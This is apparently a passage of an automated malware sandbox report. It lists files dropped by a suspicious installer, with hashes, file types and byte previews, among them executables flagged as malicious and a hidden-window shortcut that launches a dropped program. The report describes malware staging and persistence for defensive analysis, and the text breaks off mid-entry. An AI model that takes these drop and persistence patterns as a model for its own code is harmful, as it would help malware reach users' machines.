                                                                                                                                                                                                                                                                          SHA-512:17EED90683F34AAB5E6FC8FE67402CE346CC9BA2C6355B8287ED771E9166D41FC2B6C82FE6E9BC81262B1A32FE05434EDC0968321E778F6380CC9F88F474BFE6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...qiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628" xmpMM:DocumentID="xmp.did:91EA24D7191011E5B1FF9488C51C29D1" xmpMM:InstanceID="xmp.iid:91EA24D6191011E5B1FF9488C51C29D1" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6a6b844a-8117-4c4c-9b2f-30d3769ed7c7" stRef:documentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^.i.....IDATx.bb .0..;./..;@...A.P9F...y

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\5e8895f8-43aa-480b-9076-a776b34016d0.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\6fda22f5-234c-47ea-9c4c-4598ca4f1074.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):11185
                                                                                                                                                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2364728
                                                                                                                                                                                                                                                                          Entropy (8bit):6.606009669324617
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                                                                                                                                                                                                                                          MD5:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                                                                                                                          SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                                                                                                                                                                                                                                          SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                                                                                                                                                                                                                                          SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                          • Filename: 8Rmoal0v85.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: K3UtwU3CH9.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: 24EPV9vjc5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: VmjvNTbD5J.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: 1wrLmYiC62.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: vV5EOx0ipU.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: 8Rmoal0v85.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: cLm7ThwEvh.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          • Filename: LVkAi4PBv6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:<..To..To..To.:.o..To...o..To.:9o..To.:.o..To.:/o..To..Uoe.To...o|.To...o..To...o..To...o..ToRich..To................PE..d...^.?e..........#......H.....................@..............................%.....h.$.....................................................XW..,........q...p..$h....#.8)......................................(....................`...............................text...RG.......H.................. ..`.rdata..R/...`...0...L..............@..@.data................|..............@....pdata..$h...p...j..................@..@Shared...............p..............@....tls.................x..............@....rsrc....q.......r...z..............@..@................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Rubrician_20250109085412.cleanroom.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):734
                                                                                                                                                                                                                                                                          Entropy (8bit):5.423020423609568
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:zat23uXNULLWUzstOtESRcP2EmRK8tESRcP2EWKBtESRcP2rRKaHFww6ChtXO:sgYNwLLzW0BcP2HBcP2qBcP2tHWD4+
                                                                                                                                                                                                                                                                          MD5:DE6CB6BA913ACAB5F775CE512729E3FA
                                                                                                                                                                                                                                                                          SHA1:13A3613C24259E852C8983EFA490389EFDF98316
                                                                                                                                                                                                                                                                          SHA-256:2BD05DFD0FD1B1BFBF47E5C52374883C9BD91CAC4B76EB2C6C7C07B12CF7B032
                                                                                                                                                                                                                                                                          SHA-512:5E550EC6DB80C9D375AB29C392CB6667EED583F034ACC7CE09D51F6B5468F8452F93C1FE9396BC923B2FD56B7973D3859C25D39B3E781FEB3B494DA50D3DA8EA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[1B60:1B64][2025-01-09T08:54:12]i001: Burn x86 v4.0.0+8c757c0f67f26f21c6bcbbfb81b7ea8b91c35fe4, Windows v10.0 x64 (Build 19045: Service Pack 0), path: C:\Users\user\Desktop\kXzODlqJak.exe..[1B60:1B64][2025-01-09T08:54:12]i009: Command Line: ''..[1B60:1B64][2025-01-09T08:54:12]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\kXzODlqJak.exe'..[1B60:1B64][2025-01-09T08:54:12]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1B60:1B64][2025-01-09T08:54:12]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Rubrician_20250109085412.cleanroom.log'..[1B60:1B64][2025-01-09T08:54:45]i017: Exit code: 0x0..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Rubrician_20250109085415.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1120
                                                                                                                                                                                                                                                                          Entropy (8bit):5.4905952324886735
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:jPYNwLLz/G/dyIbacP24acP2pfgcP2tHWOvLfgcP2JfgcP2YfgcP2/1:jQNu/GVyGF3Faf3K7Lf3Of3pf3S1
                                                                                                                                                                                                                                                                          MD5:023A50240BAB9CD0508FBB7A594DDE4E
                                                                                                                                                                                                                                                                          SHA1:1DD220215E42709235AEA8093D69D3450D6E8DF4
                                                                                                                                                                                                                                                                          SHA-256:FF1233C206DE006B0F26BEAF2625C3597E8F037D02B3E251FFF317145C9BACE6
                                                                                                                                                                                                                                                                          SHA-512:71076FDFE2CD0399EBDE22ACDA3878E76521A59468F60C9DAD2788B3F9A22ED0F0D65F95DF15AD5882EE8518E1E71728DFFCD23559BC9138C19D422A499AF74B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[1A88:08A4][2025-01-09T08:54:13]i001: Burn x86 v4.0.0+8c757c0f67f26f21c6bcbbfb81b7ea8b91c35fe4, Windows v10.0 x64 (Build 19045: Service Pack 0), path: C:\Windows\TEMP\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe..[1A88:08A4][2025-01-09T08:54:13]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\kXzODlqJak.exe -burn.filehandle.attached=636 -burn.filehandle.self=632'..[1A88:08A4][2025-01-09T08:54:13]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\kXzODlqJak.exe'..[1A88:08A4][2025-01-09T08:54:13]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[1A88:08A4][2025-01-09T08:54:15]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Rubrician_20250109085415.log'..[1A88:08A4][2025-01-09T08:54:15]i000: Setting string variable 'WixBundleInProgressName' to value ''..[1A88:08A4][2025-01-09T08:54:15]i000: Setting string variable 'WixBundleName' to va

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\ab6a7fd2-c2a8-41ce-a1d4-21acc355eed1.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\c90995aa-29e0-49c7-9578-dee281473731.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):206855
                                                                                                                                                                                                                                                                          Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                          MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                          SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                          SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                          SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1420
                                                                                                                                                                                                                                                                          Entropy (8bit):5.385759740864035
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YJxF5sQ5szAW01Rp5yK10YO5qv70VhQu5Fa0s25w6bi3J03gIx5M:YJxF5sQ5sEW01X5y60YO5qD0VH5Fa0sb
                                                                                                                                                                                                                                                                          MD5:2D2B854FE1760A0378CEA2D703A0D4AB
                                                                                                                                                                                                                                                                          SHA1:4A75F573F64B7DE27EFC4AE4A966DB4EB357788A
                                                                                                                                                                                                                                                                          SHA-256:06B4863B62805509226ECFBD4A45C8F7F75E11602E8E892C7E4E81F9E7B3A482
                                                                                                                                                                                                                                                                          SHA-512:30F0E8482BD9A493AF645783A4BE66B54CB06486262F21AC2693C56FE6D617A36E70950ECEB9B8A931A5D67A96670120408DDCF94975AFAEF1723E40C65D5C02
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"logTime": "1005/081724", "correlationVector":"2/PmMr7SOFFRIqTwW+HesJ","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"mBsci4p0IuAlecFQAh3IDU","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"EFCCE5F7ECC74238A0D17C500D8EB81C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083130", "correlationVector":"jkXXrPbML/1ucIa5c7okZ6","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083130", "correlationVector":"CECEB17551BE48CCBF3DD12E07118D84","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083241", "correlationVector":"WUtA7xoJfeUJPFSRRtPAng","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083242", "correlationVector":"B7F67C44DD3147F7BE748158D3F8E7B5","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083444", "correlationVector":"6kKZpL8SvSsrBcj/Fl+tva","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083445", "correlationVector":"94D95442

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\fe11fabe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):5622661
                                                                                                                                                                                                                                                                          Entropy (8bit):7.723046263557884
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:j5PkZigz346apnxZq8IjyVuzP90/zL97/4qvXMOkuoNn/H3jlXRgtQwV:dPkZigzipnxZhuzVQ/lfvXMhuot/jNRC
                                                                                                                                                                                                                                                                          MD5:BED5BD07F8922209B91498A40AF66EFE
                                                                                                                                                                                                                                                                          SHA1:077A85662351A91133DBB28D7F601BE2D4C9653E
                                                                                                                                                                                                                                                                          SHA-256:A5DCC1663FAC120C61DAF0E65CC3EC1E368EA7A6F01B2693D090F9053E9156B5
                                                                                                                                                                                                                                                                          SHA-512:E836775D240C9BD60D50C56CC0F9E386922C1648BA6C1396BD217A59C99CE5B51FEFA768E079CD0519F186B2DECEE911CE95CA2DA8FFE5029E73ADBF1623A5A4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:KW7.IW7.HW7.HW7.IW7.lW7.\W7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW6.m.g...c.m.z.+%X.'1C..>Y.' D..#V.<wz.&"k.:8P.):D..#V.<"G.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7..8~.!#^.$>M../7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7..8t.-6C..9D.)9T.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.m.~...e...^.:8D..#....k.:6Z.?8E.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.>e..fb..z`7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\levtqufltbol

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 9 12:54:16 2025, mtime=Thu Jan 9 12:54:17 2025, atime=Fri Jan 3 18:13:10 2025, length=6487736, window=hide
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):982
                                                                                                                                                                                                                                                                          Entropy (8bit):4.985362073764363
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:805Ci4mllSkCh7eY//9NzLY1Shzth9mbw3wD/6tYjA5HwWrRaUsJhhuwD/T2s2sc:8xGGXHjztLmn6yAfFcXTXBm
                                                                                                                                                                                                                                                                          MD5:720C0223C3EE9C8A6FD33A94066B1FFA
                                                                                                                                                                                                                                                                          SHA1:EF30231C45D81C3F14917C8083E6FD3936F5DDFD
                                                                                                                                                                                                                                                                          SHA-256:4B78A0C0D2552739BE478C8C093534F8A2AEBD95DE6C2A1FD0547B6340E0D747
                                                                                                                                                                                                                                                                          SHA-512:591D37B3638FEF8BEF85507A6352E4DB5AFD39ED99BD27DE826CB24B9E596A998893FA224121E5B4E3C61C9694DF046A5AC744F8CDF8681A217A3C0BD79ED333
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:L..................F.... ...s'8..b..[.z..b.......^....b.......................:..DG..Yr?.D..U..k0.&...&.......y.Yd....&..b....B..b......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B)Z.n..........................d...A.p.p.D.a.t.a...B.V.1.....)Z.n..Roaming.@......EW)B)Z.n...........................f..R.o.a.m.i.n.g.....t.1.....)Z.n..REMOTE~1..\......)Z.n)Z.n....I.........................R.e.m.o.t.e.s.e.r.v.i.c.e.z.o.o._.t.e.s.t.....r.2...b.#Z.. .RESCUE~1.EXE..V......)Z.n)Z.n....%.........................R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.......w...............-.......v............W.;.....C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe..6.....\.....\.R.o.a.m.i.n.g.\.R.e.m.o.t.e.s.e.r.v.i.c.e.z.o.o._.t.e.s.t.\.R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.`.......X.......445817...........hT..CrF.f4... .@N..Yc...,...E...hT..CrF.f4... .@N..Yc...,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\morvrstbj

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2526208
                                                                                                                                                                                                                                                                          Entropy (8bit):6.697179434185451
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:qMKUORaA3LORJ81Ba8+bCo4volrEPbyI0iQXAtQJXT0HcCIFZxXQNw07f7E5GGsP:u90jwASKZpgN
                                                                                                                                                                                                                                                                          MD5:E1EF99935026E1F84F065C75819BF8E8
                                                                                                                                                                                                                                                                          SHA1:1AE0CD73731E784F733D30AC2043FC0E85914EC1
                                                                                                                                                                                                                                                                          SHA-256:1634B7E132C988B7142F2DB5B0F20059DEEDCDF9F8EC16222C495D9047F3E52C
                                                                                                                                                                                                                                                                          SHA-512:5AB53D5E9C74581E7FBCF5E7291D3FB7C8844C119FD12DAC2D25C94A534ED3048C2FBB4B6B4B167B98FEDCE9B9A1B2B2D80E3E279EEA5A792FFD865FEDE616AA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...H..W.................. ..p&.....W..........@..............................0.......&...`... ..............................................P0.......0.8.....%..t............0............................. .%.(...................hQ0..............................text..... ....... .................`..`.data......... ....... .............@....rdata........!.......!.............@..@.pdata...t....%..v....%.............@..@.xdata...W...@&..X....&.............@..@.bss..........&..........................idata.......P0......b&.............@....CRT....0....`0......h&.............@....tls.........p0......j&.............@....rsrc...8.....0......l&.............@..@.reloc........0......n&.............@..Bsfdel.... ....0......t&.............@...................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\pfce

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2526208
                                                                                                                                                                                                                                                                          Entropy (8bit):6.697179434185451
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:qMKUORaA3LORJ81Ba8+bCo4volrEPbyI0iQXAtQJXT0HcCIFZxXQNw07f7E5GGsP:u90jwASKZpgN
                                                                                                                                                                                                                                                                          MD5:E1EF99935026E1F84F065C75819BF8E8
                                                                                                                                                                                                                                                                          SHA1:1AE0CD73731E784F733D30AC2043FC0E85914EC1
                                                                                                                                                                                                                                                                          SHA-256:1634B7E132C988B7142F2DB5B0F20059DEEDCDF9F8EC16222C495D9047F3E52C
